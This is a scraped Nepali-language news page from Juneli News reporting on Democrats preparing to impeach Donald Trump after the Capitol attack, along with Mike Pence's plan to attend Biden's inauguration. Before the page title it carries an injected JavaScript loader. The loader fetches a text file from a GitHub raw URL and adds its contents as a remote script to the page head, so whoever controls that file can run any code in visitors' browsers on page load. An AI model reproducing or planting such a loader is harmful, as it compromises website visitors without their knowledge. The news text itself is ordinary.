;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ट्रम्पविरुद्ध महाअभियोग लगाउने तयारी – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ट्रम्पविरुद्ध महाअभियोग लगाउने तयारी
अन्तर्राष्ट्रिय

ट्रम्पविरुद्ध महाअभियोग लगाउने तयारी

पुस २७,

काठमाण्डाै । अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्पविरुद्ध महाभियोग दर्ता हुन सक्ने संकेत देखिएको छ । तल्लो सदनकी सभामुख नान्सी पेलोसीले ट्रम्पले राजीनामा नदिए वा उपराष्ट्रपतिले संविधानको २५ औं संशोधन बमोजिम राष्ट्रपतिलाई बर्खास्त नगरे डेमोक्र्याट्सले राष्ट्रपतिविरुद्ध महाभियोग ल्याउने चेतावानी दिएकी हुन् ।

डेमोक्र्याट्सका एक वरिष्ठ नेताले अमेरिकी प्रतिनिधिसभामा महाअभियोग दर्ता हुन सक्ने र महाअभियोगमाथि मंगलबार नै मतदान समेत हुन सक्ने बताएका बीबीसीले जनाएको छ ।

ट्रम्पको उक्साहटमा संसदमा आक्रमण भएको जनाउँदै डेमोक्र्याट्स पार्टीले राष्ट्रपति ट्रम्पविरुद्ध महाभियोग लगाउने तयारी गरेका हुन् ।

यसैबीच अमेरिकी उपराष्ट्रपति माइक पेन्स आउँदाे जनवरी २० मा हुने जो बाइडेनको सपथ ग्रहण समारोहमा उपस्थित हुनुहुने भएको छ ।

राष्ट्रपति डोनाल्ड ट्रम्पले बाइडेनको सपथ ग्रहण कार्यक्रम बहिस्कार गर्ने बताइसकेका बेला राष्ट्रपति ट्रम्पका अति निकट सहयोगीका रुपमा रहेका उपराष्ट्रपति पेन्सले पछिल्ला दिनहरुमा परिवर्तित राजनीतिक परिदृश्यलाई स्वीकार गरे ।

उनले नै नोभेम्बरमा भएको राष्ट्रपतिको निर्वाचन परिणामलाई प्रमाणीकरण गरी बाइडेन अमेरिकाको राष्ट्रपति निर्वाचित भएको घोषणा गरेका हुन् । तर यस महाभियोगका बारेमा उपराष्ट्रपतिले केही प्रतिक्रिया दिएका छैनन्।

फेसबुक प्रतिक्रियाहरु